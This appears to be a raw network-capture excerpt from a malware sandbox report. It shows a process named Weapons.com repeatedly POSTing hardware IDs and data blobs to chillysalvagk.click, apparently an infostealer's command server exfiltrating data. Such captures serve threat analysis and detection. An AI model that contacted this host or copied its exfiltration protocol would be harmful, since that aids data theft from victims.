                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 53 70 46 6d 69 33 6d 63 42 44 43 30 63 4d 67 62 65 64 49 37 41 43 58 77 56 30 33 43 42 57 61 55 54 5a 54 32 68 6f 75 50 55 34 46 4f 6a 53 50 63 4f 4c 77 53 4f 61 46 76 31 7a 52 35 30 6e 4d 58 59 75 67 54 54 38 4e 44 4d 74 35 46 67 66 79 46 6b 63 59 61 7a 30 61 57 63 59 56 31 6c 68 41 6c 76 48 33 64 47 58 4c 53 4e 51 6b 70 2b 31 39 50 79 67 68 6c 6b 67 7a 64 75 49 2b 62 6a 30 57 42 5a 35 35 77 6b 33 75 54 43 54 53 6f 4f 63 56 62 62 5a 30 30 42 47 79 70 45 30 76 45 43 47 36 65 51 4a 50 38 68 59 50 64 45 73 5a 4f 6e 47 69 57 63 70 6f 46 4b 62 74 79 31 52 4e 6d 30 54 30 61 4b 65 4e 42 43 49 46 44 62 59 59 4d 79 37 69 2b 68 4e 38 4e 77 67 75 6b 64 59 64 75 6c 67 38 75 38 32 61 55 44 44 54 61 50 30 68 30 73 56 56 48 78 67 42 6c 6e 30 57 66 39 59 32 4b 79 68 7a
                                                                  Data Ascii: SpFmi3mcBDC0cMgbedI7ACXwV03CBWaUTZT2houPU4FOjSPcOLwSOaFv1zR50nMXYugTT8NDMt5FgfyFkcYaz0aWcYV1lhAlvH3dGXLSNQkp+19PyghlkgzduI+bj0WBZ55wk3uTCTSoOcVbbZ00BGypE0vECG6eQJP8hYPdEsZOnGiWcpoFKbty1RNm0T0aKeNBCIFDbYYMy7i+hN8NwgukdYdulg8u82aUDDTaP0h0sVVHxgBln0Wf9Y2Kyhz
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 62 5a 37 68 6b 49 39 2f 57 43 61 45 6e 69 64 61 30 67 76 39 6c 42 4a 78 51 70 6d 6b 55 75 58 36 6f 4b 45 33 52 7a 41 51 70 68 76 68 48 57 51 43 43 4f 36 64 4e 59 59 63 39 6f 38 44 57 79 2f 45 30 2f 58 51 7a 4c 65 62 5a 37 7a 68 4e 69 56 58 64 34 48 6a 43 4f 44 64 4e 31 61 59 72 4e 7a 33 78 39 35 33 6a 77 4c 50 76 42 56 57 73 38 4f 59 49 78 47 6d 50 32 46 6a 73 49 65 78 30 2b 65 62 35 5a 78 6e 51 45 70 38 7a 65 61 45 6d 79 64 61 30 67 50 35 6b 56 43 79 41 39 38 6c 55 32 51 37 6f 57 54 6a 31 4f 42 57 4a 4a 79 78 43 43 4c 45 6a 57 30 5a 70 51 4d 4e 4e 6f 2f 53 48 53 78 56 55 48 4a 42 47 79 51 58 70 62 2b 68 34 7a 47 46 4d 56 42 6c 6d 4f 41 66 4a 6f 48 49 62 39 79 33 52 5a 37 32 54 6f 47 4a 66 34 54 42 6f 38 45 63 74 34 55 30 39 6d 54 67 4d 4d 51 67 56 62 62
                                                                  Data Ascii: bZ7hkI9/WCaEnida0gv9lBJxQpmkUuX6oKE3RzAQphvhHWQCCO6dNYYc9o8DWy/E0/XQzLebZ7zhNiVXd4HjCODdN1aYrNz3x953jwLPvBVWs8OYIxGmP2FjsIex0+eb5ZxnQEp8zeaEmyda0gP5kVCyA98lU2Q7oWTj1OBWJJyxCCLEjW0ZpQMNNo/SHSxVUHJBGyQXpb+h4zGFMVBlmOAfJoHIb9y3RZ72ToGJf4TBo8Ect4U09mTgMMQgVbb
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 4e 43 4a 61 73 35 67 6c 56 55 31 69 55 4e 4b 2b 63 52 66 63 77 4e 5a 4a 6c 61 30 2b 65 33 7a 59 38 63 67 52 47 73 65 73 52 75 33 56 70 77 2f 54 6e 49 56 53 79 64 64 41 73 2b 34 31 56 4c 32 51 41 74 6f 48 4b 30 37 6f 4b 45 33 78 72 57 52 74 55 74 78 48 66 64 57 68 76 7a 63 4e 30 4f 5a 63 73 2b 47 43 75 78 62 41 61 50 47 79 72 47 44 4b 62 37 68 6f 33 49 43 39 41 45 73 6e 57 4f 66 34 30 46 4e 62 77 35 6c 46 56 79 6e 57 74 62 59 72 46 58 57 59 39 62 4f 73 77 58 78 71 76 66 30 35 30 43 6a 31 44 56 64 63 51 67 7a 30 78 69 6f 54 6d 43 56 54 50 65 49 52 6f 71 38 6b 56 4c 69 44 31 55 75 56 61 65 2f 70 2b 53 38 53 50 47 55 35 68 6c 6b 32 6e 52 46 79 47 39 64 39 30 44 4e 4a 4e 7a 42 32 79 70 61 67 69 48 51 31 58 51 44 49 75 34 30 4d 50 36 48 73 39 48 6b 6e 57 56 4e
                                                                  Data Ascii: NCJas5glVU1iUNK+cRfcwNZJla0+e3zY8cgRGsesRu3Vpw/TnIVSyddAs+41VL2QAtoHK07oKE3xrWRtUtxHfdWhvzcN0OZcs+GCuxbAaPGyrGDKb7ho3IC9AEsnWOf40FNbw5lFVynWtbYrFXWY9bOswXxqvf050Cj1DVdcQgz0xioTmCVTPeIRoq8kVLiD1UuVae/p+S8SPGU5hlk2nRFyG9d90DNJNzB2ypagiHQ1XQDIu40MP6Hs9HknWVN
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 68 4e 35 6f 48 4e 49 56 7a 54 79 2f 6a 51 55 37 4d 46 57 6e 5a 63 71 33 66 68 6f 54 4f 43 39 46 65 6d 6c 32 36 62 5a 34 4d 4c 4c 52 76 79 31 55 36 6e 54 78 49 64 4d 67 54 41 49 38 38 4a 4e 35 55 30 36 44 49 74 73 77 54 7a 30 36 44 63 73 6c 66 6b 77 55 6a 70 57 6e 4e 47 6a 53 54 63 77 35 73 71 51 45 47 6a 77 64 37 33 68 54 44 71 74 50 57 6e 45 71 52 47 34 6f 74 6e 54 69 4c 51 6e 72 68 4e 35 6f 48 4e 49 56 7a 54 79 2f 6a 51 55 37 4d 46 57 6e 5a 63 71 33 66 68 6f 54 4f 43 39 46 65 6d 69 79 71 54 72 77 38 48 4b 5a 36 31 42 74 7a 79 79 4a 49 59 72 46 63 43 4a 63 36 4b 74 59 4d 72 4c 62 49 6d 34 39 46 67 58 79 57 62 59 70 2f 69 78 4e 76 6c 48 66 64 46 47 4c 4e 4a 41 64 6a 33 32 56 70 6a 30 30 71 6d 41 7a 4c 71 73 62 44 79 77 79 42 45 63 55 78 33 79 33 4f 56 58
                                                                  Data Ascii: hN5oHNIVzTy/jQU7MFWnZcq3fhoTOC9Feml26bZ4MLLRvy1U6nTxIdMgTAI88JN5U06DItswTz06DcslfkwUjpWnNGjSTcw5sqQEGjwd73hTDqtPWnEqRG4otnTiLQnrhN5oHNIVzTy/jQU7MFWnZcq3fhoTOC9FemiyqTrw8HKZ61BtzyyJIYrFcCJc6KtYMrLbIm49FgXyWbYp/ixNvlHfdFGLNJAdj32Vpj00qmAzLqsbDywyBEcUx3y3OVX
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 57 7a 54 46 63 31 42 73 33 45 46 50 33 77 41 71 30 41 79 66 75 4e 44 44 77 67 2f 47 57 5a 59 76 67 32 4b 61 51 6a 33 39 59 4a 6f 44 4e 49 56 67 52 6d 7a 6a 45 78 43 50 52 47 53 54 54 5a 44 32 69 35 48 64 47 38 4a 66 6c 69 53 36 52 72 41 51 4a 61 4e 36 6d 43 52 35 32 53 55 64 4c 2b 46 55 64 76 45 75 65 4a 6c 63 6b 4c 71 6b 68 4d 49 52 2f 33 65 69 63 6f 4e 6f 33 79 51 68 70 58 71 61 57 7a 54 46 63 31 42 73 33 45 46 50 33 77 41 6f 73 6b 75 65 39 4d 69 63 67 51 53 42 58 39 55 37 31 7a 62 64 45 47 4c 72 4f 5a 30 57 5a 73 38 31 43 7a 72 79 46 48 62 78 4c 6e 69 5a 58 4a 43 36 75 59 37 4c 43 39 52 4b 68 57 53 36 52 72 41 51 4a 61 4e 36 6d 44 42 4f 6e 77 49 65 4c 2f 46 64 54 34 39 4e 4b 6f 59 4d 79 37 69 6c 6b 63 67 4e 77 67 75 77 57 63 5a 4a 69 77 45 69 76 58 36
                                                                  Data Ascii: WzTFc1Bs3EFP3wAq0AyfuNDDwg/GWZYvg2KaQj39YJoDNIVgRmzjExCPRGSTTZD2i5HdG8JfliS6RrAQJaN6mCR52SUdL+FUdvEueJlckLqkhMIR/3eicoNo3yQhpXqaWzTFc1Bs3EFP3wAoskue9MicgQSBX9U71zbdEGLrOZ0WZs81CzryFHbxLniZXJC6uY7LC9RKhWS6RrAQJaN6mDBOnwIeL/FdT49NKoYMy7ilkcgNwguwWcZJiwEivX6


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449739172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:42 UTC286OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=GOTJK29VHUUPVXBEW77
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 18167
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:42 UTC15331OUTData Raw: 2d 2d 47 4f 54 4a 4b 32 39 56 48 55 55 50 56 58 42 45 57 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 31 45 34 41 33 34 30 41 35 32 37 43 41 31 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 47 4f 54 4a 4b 32 39 56 48 55 55 50 56 58 42 45 57 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4f 54 4a 4b 32 39 56 48 55 55 50 56 58 42 45 57 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41
                                                                  Data Ascii: --GOTJK29VHUUPVXBEW77Content-Disposition: form-data; name="hwid"F61E4A340A527CA1312F742701D40858--GOTJK29VHUUPVXBEW77Content-Disposition: form-data; name="pid"2--GOTJK29VHUUPVXBEW77Content-Disposition: form-data; name="lid"hRjzG3--GA
                                                                  2024-12-20 17:17:42 UTC2836OUTData Raw: 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf
                                                                  Data Ascii: @xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe
                                                                  2024-12-20 17:17:43 UTC1126INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:43 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=pkse5sboucltrq4ook6p7b0581; expires=Tue, 15 Apr 2025 11:04:22 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SGvLVlQMWEtcudo45JkVGQpuDwmycMBxFoEFOKpMsMT5I5tw%2B2gsC11nOnvYy325wSRyibYxKyC8fp4HgllmO3riOA2GAt1jeIX0KDiu6EMJnuGzqYXeKN9tByJGVviqcgQdWcPY"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149958f7a19c7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1797&rtt_var=693&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19133&delivery_rate=1557333&cwnd=146&unsent_bytes=0&cid=3f7e22012265b5b3&ts=1013&x=0"
                                                                  2024-12-20 17:17:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-20 17:17:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449740172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:44 UTC280OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=OXVZ5FXK3GODLM
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8758
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:44 UTC8758OUTData Raw: 2d 2d 4f 58 56 5a 35 46 58 4b 33 47 4f 44 4c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 31 45 34 41 33 34 30 41 35 32 37 43 41 31 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 4f 58 56 5a 35 46 58 4b 33 47 4f 44 4c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 58 56 5a 35 46 58 4b 33 47 4f 44 4c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4f 58 56 5a 35 46 58 4b 33 47
                                                                  Data Ascii: --OXVZ5FXK3GODLMContent-Disposition: form-data; name="hwid"F61E4A340A527CA1312F742701D40858--OXVZ5FXK3GODLMContent-Disposition: form-data; name="pid"2--OXVZ5FXK3GODLMContent-Disposition: form-data; name="lid"hRjzG3--GAS--OXVZ5FXK3G
                                                                  2024-12-20 17:17:45 UTC1133INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=hvnhlorjo6q0flu1ge569krap9; expires=Tue, 15 Apr 2025 11:04:24 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dZyPLFbObvOFCsdo1gcYa4KUYiAA2sJ%2BgLOVm%2Fwo4CVyqGCYClOQDd5e3HCb6VzwihicmFHBvE%2Fz%2B3q7d5QxNYN7bYB00kMp1A%2FXeewNt5iu8TyqtfF61wr%2BOrzuFpcSUM8d2K2c"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149a37c404381-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1577&rtt_var=595&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2848&recv_bytes=9696&delivery_rate=1833019&cwnd=211&unsent_bytes=0&cid=3d227d08de09ba73&ts=816&x=0"
                                                                  2024-12-20 17:17:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-20 17:17:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449741172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:46 UTC282OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=X6XUJSRGLPR3NXF
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 20417
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:46 UTC15331OUTData Raw: 2d 2d 58 36 58 55 4a 53 52 47 4c 50 52 33 4e 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 31 45 34 41 33 34 30 41 35 32 37 43 41 31 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 58 36 58 55 4a 53 52 47 4c 50 52 33 4e 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 36 58 55 4a 53 52 47 4c 50 52 33 4e 58 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 58 36 58 55 4a 53 52
                                                                  Data Ascii: --X6XUJSRGLPR3NXFContent-Disposition: form-data; name="hwid"F61E4A340A527CA1312F742701D40858--X6XUJSRGLPR3NXFContent-Disposition: form-data; name="pid"3--X6XUJSRGLPR3NXFContent-Disposition: form-data; name="lid"hRjzG3--GAS--X6XUJSR
                                                                  2024-12-20 17:17:46 UTC5086OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: lrQMn 64F6(X&7~`aO
                                                                  2024-12-20 17:17:47 UTC1128INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=a7o05p4jao1hkhgbobmun7eboo; expires=Tue, 15 Apr 2025 11:04:26 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XE6pDKCtC2YLhWpLyQNaYqS1JrU%2Feif8y6wLtHva4UtMZo6amyBdWavOr2W3B%2B72UG%2BuPvHGUbDWcvjIR8GOM6Kz5gpqrUOGuIwQz36lVzqMboT17EbH0peIwcFpOJjFNlQYgLl5"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149b0f9897d13-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1850&min_rtt=1850&rtt_var=925&sent=17&recv=26&lost=0&retrans=1&sent_bytes=4236&recv_bytes=21379&delivery_rate=225378&cwnd=252&unsent_bytes=0&cid=77900f9eaa2e5ef2&ts=975&x=0"
                                                                  2024-12-20 17:17:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-20 17:17:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449742172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:49 UTC285OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=47L2TV08AJ6VOHFPEBN
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1272
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:49 UTC1272OUTData Raw: 2d 2d 34 37 4c 32 54 56 30 38 41 4a 36 56 4f 48 46 50 45 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 31 45 34 41 33 34 30 41 35 32 37 43 41 31 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 34 37 4c 32 54 56 30 38 41 4a 36 56 4f 48 46 50 45 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 37 4c 32 54 56 30 38 41 4a 36 56 4f 48 46 50 45 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41
                                                                  Data Ascii: --47L2TV08AJ6VOHFPEBNContent-Disposition: form-data; name="hwid"F61E4A340A527CA1312F742701D40858--47L2TV08AJ6VOHFPEBNContent-Disposition: form-data; name="pid"1--47L2TV08AJ6VOHFPEBNContent-Disposition: form-data; name="lid"hRjzG3--GA
                                                                  2024-12-20 17:17:49 UTC1124INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=tmr1l0ak024915vgn66ed8gq7g; expires=Tue, 15 Apr 2025 11:04:28 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYuoe0CgSDSBETi%2FU6bPTltPU4FgTN2%2Bkaf67ziHihsgxgnj9xm04HXZ86Kbt2wQmHIp5zJNWCCsjQk8KLIZBeHR5lSpX5o2QMtWs22Y5GoNWEFQPBL10eX8HgN80Zr5W4RpS88Q"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149bf6d231865-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1697&rtt_var=664&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2193&delivery_rate=1613259&cwnd=195&unsent_bytes=0&cid=cff6e0bd45586ad0&ts=771&x=0"
                                                                  2024-12-20 17:17:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-20 17:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449743172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:51 UTC279OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=YE0DIPISOMVKW
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1098
                                                                  Host: chillysalvagk.click
